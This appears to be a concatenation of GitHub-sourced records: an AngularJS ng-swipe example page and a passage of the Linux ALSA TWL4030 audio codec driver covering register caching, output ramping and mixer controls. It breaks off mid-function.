'legal_line_cnt' cencoding_key_illegal_cnt = 'illegal_line_cnt'
{ "pile_set_name": "Github" }
<!doctype html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Example - example-ng-swipe-right-jquery</title> <script src="../../components/jquery-3.1.1/jquery.js"></script> <script src="../../../angular.js"></script> <script src="../../../angular-touch.js"></script> <script src="script.js"></script> </head> <body ng-app="ngSwipeRightExample"> <div ng-show="!showActions" ng-swipe-left="showActions = true"> Some list content, like an email in the inbox </div> <div ng-show="showActions" ng-swipe-right="showActions = false"> <button ng-click="reply()">Reply</button> <button ng-click="delete()">Delete</button> </div> </body> </html>
{ "pile_set_name": "Github" }
// SPDX-License-Identifier: GPL-2.0-only /* * ALSA SoC TWL4030 codec driver * * Author: Steve Sakoman, <[email protected]> */ #include <linux/module.h> #include <linux/moduleparam.h> #include <linux/init.h> #include <linux/delay.h> #include <linux/pm.h> #include <linux/i2c.h> #include <linux/platform_device.h> #include <linux/of.h> #include <linux/of_gpio.h> #include <linux/mfd/twl.h> #include <linux/slab.h> #include <linux/gpio.h> #include <sound/core.h> #include <sound/pcm.h> #include <sound/pcm_params.h> #include <sound/soc.h> #include <sound/initval.h> #include <sound/tlv.h> /* Register descriptions are here */ #include <linux/mfd/twl4030-audio.h> /* TWL4030 PMBR1 Register */ #define TWL4030_PMBR1_REG 0x0D /* TWL4030 PMBR1 Register GPIO6 mux bits */ #define TWL4030_GPIO6_PWM0_MUTE(value) ((value & 0x03) << 2) #define TWL4030_CACHEREGNUM (TWL4030_REG_MISC_SET_2 + 1) /* codec private data */ struct twl4030_priv { unsigned int codec_powered; /* reference counts of AIF/APLL users */ unsigned int apll_enabled; struct snd_pcm_substream *master_substream; struct snd_pcm_substream *slave_substream; unsigned int configured; unsigned int rate; unsigned int sample_bits; unsigned int channels; unsigned int sysclk; /* Output (with associated amp) states */ u8 hsl_enabled, hsr_enabled; u8 earpiece_enabled; u8 predrivel_enabled, predriver_enabled; u8 carkitl_enabled, carkitr_enabled; u8 ctl_cache[TWL4030_REG_PRECKR_CTL - TWL4030_REG_EAR_CTL + 1]; struct twl4030_codec_data *pdata; }; static void tw4030_init_ctl_cache(struct twl4030_priv *twl4030) { int i; u8 byte; for (i = TWL4030_REG_EAR_CTL; i <= TWL4030_REG_PRECKR_CTL; i++) { twl_i2c_read_u8(TWL4030_MODULE_AUDIO_VOICE, &byte, i); twl4030->ctl_cache[i - TWL4030_REG_EAR_CTL] = byte; } } static unsigned int twl4030_read(struct snd_soc_component *component, unsigned int reg) { struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 value = 0; if (reg >= TWL4030_CACHEREGNUM) return -EIO; switch (reg) { case TWL4030_REG_EAR_CTL: case TWL4030_REG_PREDL_CTL: case TWL4030_REG_PREDR_CTL: case TWL4030_REG_PRECKL_CTL: case TWL4030_REG_PRECKR_CTL: case TWL4030_REG_HS_GAIN_SET: value = twl4030->ctl_cache[reg - TWL4030_REG_EAR_CTL]; break; default: twl_i2c_read_u8(TWL4030_MODULE_AUDIO_VOICE, &value, reg); break; } return value; } static bool twl4030_can_write_to_chip(struct twl4030_priv *twl4030, unsigned int reg) { bool write_to_reg = false; /* Decide if the given register can be written */ switch (reg) { case TWL4030_REG_EAR_CTL: if (twl4030->earpiece_enabled) write_to_reg = true; break; case TWL4030_REG_PREDL_CTL: if (twl4030->predrivel_enabled) write_to_reg = true; break; case TWL4030_REG_PREDR_CTL: if (twl4030->predriver_enabled) write_to_reg = true; break; case TWL4030_REG_PRECKL_CTL: if (twl4030->carkitl_enabled) write_to_reg = true; break; case TWL4030_REG_PRECKR_CTL: if (twl4030->carkitr_enabled) write_to_reg = true; break; case TWL4030_REG_HS_GAIN_SET: if (twl4030->hsl_enabled || twl4030->hsr_enabled) write_to_reg = true; break; default: /* All other register can be written */ write_to_reg = true; break; } return write_to_reg; } static int twl4030_write(struct snd_soc_component *component, unsigned int reg, unsigned int value) { struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); /* Update the ctl cache */ switch (reg) { case TWL4030_REG_EAR_CTL: case TWL4030_REG_PREDL_CTL: case TWL4030_REG_PREDR_CTL: case TWL4030_REG_PRECKL_CTL: case TWL4030_REG_PRECKR_CTL: case TWL4030_REG_HS_GAIN_SET: twl4030->ctl_cache[reg - TWL4030_REG_EAR_CTL] = value; break; default: break; } if (twl4030_can_write_to_chip(twl4030, reg)) return twl_i2c_write_u8(TWL4030_MODULE_AUDIO_VOICE, value, reg); return 0; } static inline void twl4030_wait_ms(int time) { if (time < 60) { time *= 1000; usleep_range(time, time + 500); } else { msleep(time); } } static void twl4030_codec_enable(struct snd_soc_component *component, int enable) { struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); int mode; if (enable == twl4030->codec_powered) return; if (enable) mode = twl4030_audio_enable_resource(TWL4030_AUDIO_RES_POWER); else mode = twl4030_audio_disable_resource(TWL4030_AUDIO_RES_POWER); if (mode >= 0) twl4030->codec_powered = enable; /* REVISIT: this delay is present in TI sample drivers */ /* but there seems to be no TRM requirement for it */ udelay(10); } static void twl4030_setup_pdata_of(struct twl4030_codec_data *pdata, struct device_node *node) { int value; of_property_read_u32(node, "ti,digimic_delay", &pdata->digimic_delay); of_property_read_u32(node, "ti,ramp_delay_value", &pdata->ramp_delay_value); of_property_read_u32(node, "ti,offset_cncl_path", &pdata->offset_cncl_path); if (!of_property_read_u32(node, "ti,hs_extmute", &value)) pdata->hs_extmute = value; pdata->hs_extmute_gpio = of_get_named_gpio(node, "ti,hs_extmute_gpio", 0); if (gpio_is_valid(pdata->hs_extmute_gpio)) pdata->hs_extmute = 1; } static struct twl4030_codec_data *twl4030_get_pdata(struct snd_soc_component *component) { struct twl4030_codec_data *pdata = dev_get_platdata(component->dev); struct device_node *twl4030_codec_node = NULL; twl4030_codec_node = of_get_child_by_name(component->dev->parent->of_node, "codec"); if (!pdata && twl4030_codec_node) { pdata = devm_kzalloc(component->dev, sizeof(struct twl4030_codec_data), GFP_KERNEL); if (!pdata) { of_node_put(twl4030_codec_node); return NULL; } twl4030_setup_pdata_of(pdata, twl4030_codec_node); of_node_put(twl4030_codec_node); } return pdata; } static void twl4030_init_chip(struct snd_soc_component *component) { struct twl4030_codec_data *pdata; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); u8 reg, byte; int i = 0; pdata = twl4030_get_pdata(component); if (pdata && pdata->hs_extmute) { if (gpio_is_valid(pdata->hs_extmute_gpio)) { int ret; if (!pdata->hs_extmute_gpio) dev_warn(component->dev, "Extmute GPIO is 0 is this correct?\n"); ret = gpio_request_one(pdata->hs_extmute_gpio, GPIOF_OUT_INIT_LOW, "hs_extmute"); if (ret) { dev_err(component->dev, "Failed to get hs_extmute GPIO\n"); pdata->hs_extmute_gpio = -1; } } else { u8 pin_mux; /* Set TWL4030 GPIO6 as EXTMUTE signal */ twl_i2c_read_u8(TWL4030_MODULE_INTBR, &pin_mux, TWL4030_PMBR1_REG); pin_mux &= ~TWL4030_GPIO6_PWM0_MUTE(0x03); pin_mux |= TWL4030_GPIO6_PWM0_MUTE(0x02); twl_i2c_write_u8(TWL4030_MODULE_INTBR, pin_mux, TWL4030_PMBR1_REG); } } /* Initialize the local ctl register cache */ tw4030_init_ctl_cache(twl4030); /* anti-pop when changing analog gain */ reg = twl4030_read(component, TWL4030_REG_MISC_SET_1); twl4030_write(component, TWL4030_REG_MISC_SET_1, reg | TWL4030_SMOOTH_ANAVOL_EN); twl4030_write(component, TWL4030_REG_OPTION, TWL4030_ATXL1_EN | TWL4030_ATXR1_EN | TWL4030_ARXL2_EN | TWL4030_ARXR2_EN); /* REG_ARXR2_APGA_CTL reset according to the TRM: 0dB, DA_EN */ twl4030_write(component, TWL4030_REG_ARXR2_APGA_CTL, 0x32); /* Machine dependent setup */ if (!pdata) return; twl4030->pdata = pdata; reg = twl4030_read(component, TWL4030_REG_HS_POPN_SET); reg &= ~TWL4030_RAMP_DELAY; reg |= (pdata->ramp_delay_value << 2); twl4030_write(component, TWL4030_REG_HS_POPN_SET, reg); /* initiate offset cancellation */ twl4030_codec_enable(component, 1); reg = twl4030_read(component, TWL4030_REG_ANAMICL); reg &= ~TWL4030_OFFSET_CNCL_SEL; reg |= pdata->offset_cncl_path; twl4030_write(component, TWL4030_REG_ANAMICL, reg | TWL4030_CNCL_OFFSET_START); /* * Wait for offset cancellation to complete. * Since this takes a while, do not slam the i2c. * Start polling the status after ~20ms. */ msleep(20); do { usleep_range(1000, 2000); twl_set_regcache_bypass(TWL4030_MODULE_AUDIO_VOICE, true); twl_i2c_read_u8(TWL4030_MODULE_AUDIO_VOICE, &byte, TWL4030_REG_ANAMICL); twl_set_regcache_bypass(TWL4030_MODULE_AUDIO_VOICE, false); } while ((i++ < 100) && ((byte & TWL4030_CNCL_OFFSET_START) == TWL4030_CNCL_OFFSET_START)); twl4030_codec_enable(component, 0); } static void twl4030_apll_enable(struct snd_soc_component *component, int enable) { struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); if (enable) { twl4030->apll_enabled++; if (twl4030->apll_enabled == 1) twl4030_audio_enable_resource( TWL4030_AUDIO_RES_APLL); } else { twl4030->apll_enabled--; if (!twl4030->apll_enabled) twl4030_audio_disable_resource( TWL4030_AUDIO_RES_APLL); } } /* Earpiece */ static const struct snd_kcontrol_new twl4030_dapm_earpiece_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_EAR_CTL, 0, 1, 0), SOC_DAPM_SINGLE("AudioL1", TWL4030_REG_EAR_CTL, 1, 1, 0), SOC_DAPM_SINGLE("AudioL2", TWL4030_REG_EAR_CTL, 2, 1, 0), SOC_DAPM_SINGLE("AudioR1", TWL4030_REG_EAR_CTL, 3, 1, 0), }; /* PreDrive Left */ static const struct snd_kcontrol_new twl4030_dapm_predrivel_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_PREDL_CTL, 0, 1, 0), SOC_DAPM_SINGLE("AudioL1", TWL4030_REG_PREDL_CTL, 1, 1, 0), SOC_DAPM_SINGLE("AudioL2", TWL4030_REG_PREDL_CTL, 2, 1, 0), SOC_DAPM_SINGLE("AudioR2", TWL4030_REG_PREDL_CTL, 3, 1, 0), }; /* PreDrive Right */ static const struct snd_kcontrol_new twl4030_dapm_predriver_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_PREDR_CTL, 0, 1, 0), SOC_DAPM_SINGLE("AudioR1", TWL4030_REG_PREDR_CTL, 1, 1, 0), SOC_DAPM_SINGLE("AudioR2", TWL4030_REG_PREDR_CTL, 2, 1, 0), SOC_DAPM_SINGLE("AudioL2", TWL4030_REG_PREDR_CTL, 3, 1, 0), }; /* Headset Left */ static const struct snd_kcontrol_new twl4030_dapm_hsol_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_HS_SEL, 0, 1, 0), SOC_DAPM_SINGLE("AudioL1", TWL4030_REG_HS_SEL, 1, 1, 0), SOC_DAPM_SINGLE("AudioL2", TWL4030_REG_HS_SEL, 2, 1, 0), }; /* Headset Right */ static const struct snd_kcontrol_new twl4030_dapm_hsor_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_HS_SEL, 3, 1, 0), SOC_DAPM_SINGLE("AudioR1", TWL4030_REG_HS_SEL, 4, 1, 0), SOC_DAPM_SINGLE("AudioR2", TWL4030_REG_HS_SEL, 5, 1, 0), }; /* Carkit Left */ static const struct snd_kcontrol_new twl4030_dapm_carkitl_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_PRECKL_CTL, 0, 1, 0), SOC_DAPM_SINGLE("AudioL1", TWL4030_REG_PRECKL_CTL, 1, 1, 0), SOC_DAPM_SINGLE("AudioL2", TWL4030_REG_PRECKL_CTL, 2, 1, 0), }; /* Carkit Right */ static const struct snd_kcontrol_new twl4030_dapm_carkitr_controls[] = { SOC_DAPM_SINGLE("Voice", TWL4030_REG_PRECKR_CTL, 0, 1, 0), SOC_DAPM_SINGLE("AudioR1", TWL4030_REG_PRECKR_CTL, 1, 1, 0), SOC_DAPM_SINGLE("AudioR2", TWL4030_REG_PRECKR_CTL, 2, 1, 0), }; /* Handsfree Left */ static const char *twl4030_handsfreel_texts[] = {"Voice", "AudioL1", "AudioL2", "AudioR2"}; static SOC_ENUM_SINGLE_DECL(twl4030_handsfreel_enum, TWL4030_REG_HFL_CTL, 0, twl4030_handsfreel_texts); static const struct snd_kcontrol_new twl4030_dapm_handsfreel_control = SOC_DAPM_ENUM("Route", twl4030_handsfreel_enum); /* Handsfree Left virtual mute */ static const struct snd_kcontrol_new twl4030_dapm_handsfreelmute_control = SOC_DAPM_SINGLE_VIRT("Switch", 1); /* Handsfree Right */ static const char *twl4030_handsfreer_texts[] = {"Voice", "AudioR1", "AudioR2", "AudioL2"}; static SOC_ENUM_SINGLE_DECL(twl4030_handsfreer_enum, TWL4030_REG_HFR_CTL, 0, twl4030_handsfreer_texts); static const struct snd_kcontrol_new twl4030_dapm_handsfreer_control = SOC_DAPM_ENUM("Route", twl4030_handsfreer_enum); /* Handsfree Right virtual mute */ static const struct snd_kcontrol_new twl4030_dapm_handsfreermute_control = SOC_DAPM_SINGLE_VIRT("Switch", 1); /* Vibra */ /* Vibra audio path selection */ static const char *twl4030_vibra_texts[] = {"AudioL1", "AudioR1", "AudioL2", "AudioR2"}; static SOC_ENUM_SINGLE_DECL(twl4030_vibra_enum, TWL4030_REG_VIBRA_CTL, 2, twl4030_vibra_texts); static const struct snd_kcontrol_new twl4030_dapm_vibra_control = SOC_DAPM_ENUM("Route", twl4030_vibra_enum); /* Vibra path selection: local vibrator (PWM) or audio driven */ static const char *twl4030_vibrapath_texts[] = {"Local vibrator", "Audio"}; static SOC_ENUM_SINGLE_DECL(twl4030_vibrapath_enum, TWL4030_REG_VIBRA_CTL, 4, twl4030_vibrapath_texts); static const struct snd_kcontrol_new twl4030_dapm_vibrapath_control = SOC_DAPM_ENUM("Route", twl4030_vibrapath_enum); /* Left analog microphone selection */ static const struct snd_kcontrol_new twl4030_dapm_analoglmic_controls[] = { SOC_DAPM_SINGLE("Main Mic Capture Switch", TWL4030_REG_ANAMICL, 0, 1, 0), SOC_DAPM_SINGLE("Headset Mic Capture Switch", TWL4030_REG_ANAMICL, 1, 1, 0), SOC_DAPM_SINGLE("AUXL Capture Switch", TWL4030_REG_ANAMICL, 2, 1, 0), SOC_DAPM_SINGLE("Carkit Mic Capture Switch", TWL4030_REG_ANAMICL, 3, 1, 0), }; /* Right analog microphone selection */ static const struct snd_kcontrol_new twl4030_dapm_analogrmic_controls[] = { SOC_DAPM_SINGLE("Sub Mic Capture Switch", TWL4030_REG_ANAMICR, 0, 1, 0), SOC_DAPM_SINGLE("AUXR Capture Switch", TWL4030_REG_ANAMICR, 2, 1, 0), }; /* TX1 L/R Analog/Digital microphone selection */ static const char *twl4030_micpathtx1_texts[] = {"Analog", "Digimic0"}; static SOC_ENUM_SINGLE_DECL(twl4030_micpathtx1_enum, TWL4030_REG_ADCMICSEL, 0, twl4030_micpathtx1_texts); static const struct snd_kcontrol_new twl4030_dapm_micpathtx1_control = SOC_DAPM_ENUM("Route", twl4030_micpathtx1_enum); /* TX2 L/R Analog/Digital microphone selection */ static const char *twl4030_micpathtx2_texts[] = {"Analog", "Digimic1"}; static SOC_ENUM_SINGLE_DECL(twl4030_micpathtx2_enum, TWL4030_REG_ADCMICSEL, 2, twl4030_micpathtx2_texts); static const struct snd_kcontrol_new twl4030_dapm_micpathtx2_control = SOC_DAPM_ENUM("Route", twl4030_micpathtx2_enum); /* Analog bypass for AudioR1 */ static const struct snd_kcontrol_new twl4030_dapm_abypassr1_control = SOC_DAPM_SINGLE("Switch", TWL4030_REG_ARXR1_APGA_CTL, 2, 1, 0); /* Analog bypass for AudioL1 */ static const struct snd_kcontrol_new twl4030_dapm_abypassl1_control = SOC_DAPM_SINGLE("Switch", TWL4030_REG_ARXL1_APGA_CTL, 2, 1, 0); /* Analog bypass for AudioR2 */ static const struct snd_kcontrol_new twl4030_dapm_abypassr2_control = SOC_DAPM_SINGLE("Switch", TWL4030_REG_ARXR2_APGA_CTL, 2, 1, 0); /* Analog bypass for AudioL2 */ static const struct snd_kcontrol_new twl4030_dapm_abypassl2_control = SOC_DAPM_SINGLE("Switch", TWL4030_REG_ARXL2_APGA_CTL, 2, 1, 0); /* Analog bypass for Voice */ static const struct snd_kcontrol_new twl4030_dapm_abypassv_control = SOC_DAPM_SINGLE("Switch", TWL4030_REG_VDL_APGA_CTL, 2, 1, 0); /* Digital bypass gain, mute instead of -30dB */ static const DECLARE_TLV_DB_RANGE(twl4030_dapm_dbypass_tlv, 0, 1, TLV_DB_SCALE_ITEM(-3000, 600, 1), 2, 3, TLV_DB_SCALE_ITEM(-2400, 0, 0), 4, 7, TLV_DB_SCALE_ITEM(-1800, 600, 0) ); /* Digital bypass left (TX1L -> RX2L) */ static const struct snd_kcontrol_new twl4030_dapm_dbypassl_control = SOC_DAPM_SINGLE_TLV("Volume", TWL4030_REG_ATX2ARXPGA, 3, 7, 0, twl4030_dapm_dbypass_tlv); /* Digital bypass right (TX1R -> RX2R) */ static const struct snd_kcontrol_new twl4030_dapm_dbypassr_control = SOC_DAPM_SINGLE_TLV("Volume", TWL4030_REG_ATX2ARXPGA, 0, 7, 0, twl4030_dapm_dbypass_tlv); /* * Voice Sidetone GAIN volume control: * from -51 to -10 dB in 1 dB steps (mute instead of -51 dB) */ static DECLARE_TLV_DB_SCALE(twl4030_dapm_dbypassv_tlv, -5100, 100, 1); /* Digital bypass voice: sidetone (VUL -> VDL)*/ static const struct snd_kcontrol_new twl4030_dapm_dbypassv_control = SOC_DAPM_SINGLE_TLV("Volume", TWL4030_REG_VSTPGA, 0, 0x29, 0, twl4030_dapm_dbypassv_tlv); /* * Output PGA builder: * Handle the muting and unmuting of the given output (turning off the * amplifier associated with the output pin) * On mute bypass the reg_cache and write 0 to the register * On unmute: restore the register content from the reg_cache * Outputs handled in this way: Earpiece, PreDrivL/R, CarkitL/R */ #define TWL4030_OUTPUT_PGA(pin_name, reg, mask) \ static int pin_name##pga_event(struct snd_soc_dapm_widget *w, \ struct snd_kcontrol *kcontrol, int event) \ { \ struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); \ struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); \ \ switch (event) { \ case SND_SOC_DAPM_POST_PMU: \ twl4030->pin_name##_enabled = 1; \ twl4030_write(component, reg, twl4030_read(component, reg)); \ break; \ case SND_SOC_DAPM_POST_PMD: \ twl4030->pin_name##_enabled = 0; \ twl_i2c_write_u8(TWL4030_MODULE_AUDIO_VOICE, 0, reg); \ break; \ } \ return 0; \ } TWL4030_OUTPUT_PGA(earpiece, TWL4030_REG_EAR_CTL, TWL4030_EAR_GAIN); TWL4030_OUTPUT_PGA(predrivel, TWL4030_REG_PREDL_CTL, TWL4030_PREDL_GAIN); TWL4030_OUTPUT_PGA(predriver, TWL4030_REG_PREDR_CTL, TWL4030_PREDR_GAIN); TWL4030_OUTPUT_PGA(carkitl, TWL4030_REG_PRECKL_CTL, TWL4030_PRECKL_GAIN); TWL4030_OUTPUT_PGA(carkitr, TWL4030_REG_PRECKR_CTL, TWL4030_PRECKR_GAIN); static void handsfree_ramp(struct snd_soc_component *component, int reg, int ramp) { unsigned char hs_ctl; hs_ctl = twl4030_read(component, reg); if (ramp) { /* HF ramp-up */ hs_ctl |= TWL4030_HF_CTL_REF_EN; twl4030_write(component, reg, hs_ctl); udelay(10); hs_ctl |= TWL4030_HF_CTL_RAMP_EN; twl4030_write(component, reg, hs_ctl); udelay(40); hs_ctl |= TWL4030_HF_CTL_LOOP_EN; hs_ctl |= TWL4030_HF_CTL_HB_EN; twl4030_write(component, reg, hs_ctl); } else { /* HF ramp-down */ hs_ctl &= ~TWL4030_HF_CTL_LOOP_EN; hs_ctl &= ~TWL4030_HF_CTL_HB_EN; twl4030_write(component, reg, hs_ctl); hs_ctl &= ~TWL4030_HF_CTL_RAMP_EN; twl4030_write(component, reg, hs_ctl); udelay(40); hs_ctl &= ~TWL4030_HF_CTL_REF_EN; twl4030_write(component, reg, hs_ctl); } } static int handsfreelpga_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); switch (event) { case SND_SOC_DAPM_POST_PMU: handsfree_ramp(component, TWL4030_REG_HFL_CTL, 1); break; case SND_SOC_DAPM_POST_PMD: handsfree_ramp(component, TWL4030_REG_HFL_CTL, 0); break; } return 0; } static int handsfreerpga_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); switch (event) { case SND_SOC_DAPM_POST_PMU: handsfree_ramp(component, TWL4030_REG_HFR_CTL, 1); break; case SND_SOC_DAPM_POST_PMD: handsfree_ramp(component, TWL4030_REG_HFR_CTL, 0); break; } return 0; } static int vibramux_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); twl4030_write(component, TWL4030_REG_VIBRA_SET, 0xff); return 0; } static int apll_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); switch (event) { case SND_SOC_DAPM_PRE_PMU: twl4030_apll_enable(component, 1); break; case SND_SOC_DAPM_POST_PMD: twl4030_apll_enable(component, 0); break; } return 0; } static int aif_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); u8 audio_if; audio_if = twl4030_read(component, TWL4030_REG_AUDIO_IF); switch (event) { case SND_SOC_DAPM_PRE_PMU: /* Enable AIF */ /* enable the PLL before we use it to clock the DAI */ twl4030_apll_enable(component, 1); twl4030_write(component, TWL4030_REG_AUDIO_IF, audio_if | TWL4030_AIF_EN); break; case SND_SOC_DAPM_POST_PMD: /* disable the DAI before we stop it's source PLL */ twl4030_write(component, TWL4030_REG_AUDIO_IF, audio_if & ~TWL4030_AIF_EN); twl4030_apll_enable(component, 0); break; } return 0; } static void headset_ramp(struct snd_soc_component *component, int ramp) { unsigned char hs_gain, hs_pop; struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); struct twl4030_codec_data *pdata = twl4030->pdata; /* Base values for ramp delay calculation: 2^19 - 2^26 */ unsigned int ramp_base[] = {524288, 1048576, 2097152, 4194304, 8388608, 16777216, 33554432, 67108864}; unsigned int delay; hs_gain = twl4030_read(component, TWL4030_REG_HS_GAIN_SET); hs_pop = twl4030_read(component, TWL4030_REG_HS_POPN_SET); delay = (ramp_base[(hs_pop & TWL4030_RAMP_DELAY) >> 2] / twl4030->sysclk) + 1; /* Enable external mute control, this dramatically reduces * the pop-noise */ if (pdata && pdata->hs_extmute) { if (gpio_is_valid(pdata->hs_extmute_gpio)) { gpio_set_value(pdata->hs_extmute_gpio, 1); } else { hs_pop |= TWL4030_EXTMUTE; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); } } if (ramp) { /* Headset ramp-up according to the TRM */ hs_pop |= TWL4030_VMID_EN; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); /* Actually write to the register */ twl_i2c_write_u8(TWL4030_MODULE_AUDIO_VOICE, hs_gain, TWL4030_REG_HS_GAIN_SET); hs_pop |= TWL4030_RAMP_EN; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); /* Wait ramp delay time + 1, so the VMID can settle */ twl4030_wait_ms(delay); } else { /* Headset ramp-down _not_ according to * the TRM, but in a way that it is working */ hs_pop &= ~TWL4030_RAMP_EN; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); /* Wait ramp delay time + 1, so the VMID can settle */ twl4030_wait_ms(delay); /* Bypass the reg_cache to mute the headset */ twl_i2c_write_u8(TWL4030_MODULE_AUDIO_VOICE, hs_gain & (~0x0f), TWL4030_REG_HS_GAIN_SET); hs_pop &= ~TWL4030_VMID_EN; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); } /* Disable external mute */ if (pdata && pdata->hs_extmute) { if (gpio_is_valid(pdata->hs_extmute_gpio)) { gpio_set_value(pdata->hs_extmute_gpio, 0); } else { hs_pop &= ~TWL4030_EXTMUTE; twl4030_write(component, TWL4030_REG_HS_POPN_SET, hs_pop); } } } static int headsetlpga_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); switch (event) { case SND_SOC_DAPM_POST_PMU: /* Do the ramp-up only once */ if (!twl4030->hsr_enabled) headset_ramp(component, 1); twl4030->hsl_enabled = 1; break; case SND_SOC_DAPM_POST_PMD: /* Do the ramp-down only if both headsetL/R is disabled */ if (!twl4030->hsr_enabled) headset_ramp(component, 0); twl4030->hsl_enabled = 0; break; } return 0; } static int headsetrpga_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); switch (event) { case SND_SOC_DAPM_POST_PMU: /* Do the ramp-up only once */ if (!twl4030->hsl_enabled) headset_ramp(component, 1); twl4030->hsr_enabled = 1; break; case SND_SOC_DAPM_POST_PMD: /* Do the ramp-down only if both headsetL/R is disabled */ if (!twl4030->hsl_enabled) headset_ramp(component, 0); twl4030->hsr_enabled = 0; break; } return 0; } static int digimic_event(struct snd_soc_dapm_widget *w, struct snd_kcontrol *kcontrol, int event) { struct snd_soc_component *component = snd_soc_dapm_to_component(w->dapm); struct twl4030_priv *twl4030 = snd_soc_component_get_drvdata(component); struct twl4030_codec_data *pdata = twl4030->pdata; if (pdata && pdata->digimic_delay) twl4030_wait_ms(pdata->digimic_delay); return 0; } /* * Some of the gain controls in TWL (mostly those which are associated with * the outputs) are implemented in an interesting way: * 0x0 : Power down (mute) * 0x1 : 6dB * 0x2 : 0 dB * 0x3 : -6 dB * Inverting not going to help with these. * Custom volsw and volsw_2r get/put functions to handle these gain bits. */ static int snd_soc_get_volsw_twl4030(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value *ucontrol) { struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; struct snd_soc_component *component = snd_soc_kcontrol_component(kcontrol); unsigned int reg = mc->reg; unsigned int shift = mc->shift; unsigned int rshift = mc->rshift; int max = mc->max; int mask = (1 << fls(max)) - 1; ucontrol->value.integer.value[0] = (twl4030_read(component, reg) >> shift) & mask; if (ucontrol->value.integer.value[0]) ucontrol->value.integer.value[0] = max + 1 - ucontrol->value.integer.value[0]; if (shift != rshift) { ucontrol->value.integer.value[1] = (twl4030_read(component, reg) >> rshift) & mask; if (ucontrol->value.integer.value[1]) ucontrol->value.integer.value[1] = max + 1 - ucontrol->value.integer.value[1]; } return 0; } static int snd_soc_put_volsw_twl4030(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value *ucontrol) { struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; struct snd_soc_component *component = snd_soc_kcontrol_component(kcontrol); unsigned int reg = mc->reg; unsigned int shift = mc->shift; unsigned int rshift = mc->rshift; int max = mc->max; int mask = (1 << fls(max)) - 1; unsigned short val, val2, val_mask; val = (ucontrol->value.integer.value[0] & mask); val_mask = mask << shift; if (val) val = max + 1 - val; val = val << shift; if (shift != rshift) { val2 = (ucontrol->value.integer.value[1] & mask); val_mask |= mask << rshift; if (val2) val2 = max + 1 - val2; val |= val2 << rshift; } return snd_soc_component_update_bits(component, reg, val_mask, val); } static int snd_soc_get_volsw_r2_twl4030(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value *ucontrol) { struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; struct snd_soc_component *component = snd_soc_kcontrol_component(kcontrol); unsigned int reg = mc->reg; unsigned int reg2 = mc->rreg; unsigned int shift = mc->shift; int max = mc->max; int mask = (1<<fls(max))-1; ucontrol->value.integer.value[0] = (twl4030_read(component, reg) >> shift) & mask; ucontrol->value.integer.value[1] = (twl4030_read(component, reg2) >> shift) & mask; if (ucontrol->value.integer.value[0]) ucontrol->value.integer.value[0] = max + 1 - ucontrol->value.integer.value[0]; if (ucontrol->value.integer.value[1]) ucontrol->value.integer.value[1] = max + 1 - ucontrol->value.integer.value[1]; return 0; } static int snd_soc_put_volsw_r2_twl4030(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value *ucontrol) { struct soc_mixer_control *mc = (struct soc_mixer_control *)kcontrol->private_value; struct snd_soc_component *component = snd_soc_kcontrol_component(kcontrol); unsigned int reg = mc->reg; unsigned int reg2 = mc->rreg; unsigned int shift = mc->shift; int max = mc->max; int mask = (1 << fls(max)) - 1; int err; unsigned short val, val2, val_mask; val_mask = mask << shift; val = (ucontrol->value.integer.value[0] & mask); val2 = (ucontrol->value.integer.value[1] & mask); if (val) val = max + 1 - val; if (val2) val2 = max + 1 - val2; val = val << shift; val2 = val2 << shift; err = snd_soc_component_update_bits(component, reg, val_mask, val); if (err < 0) return err; err = snd_soc_component_update_bits(component, reg2, val_mask, val2); return err; } /* Codec operation modes */ static const char *twl4030_op_modes_texts[] = { "Option 2 (voice/audio)", "Option 1 (audio)" }; static SOC_ENUM_SINGLE_DECL(twl4030_op_modes_enum, TWL4030_REG_CODEC_MODE, 0, twl4030_op_modes_texts); static int snd_soc_put_twl4030_opmode_enum_double(struct snd_kcontrol *kcontrol, struct snd_ctl_elem_value 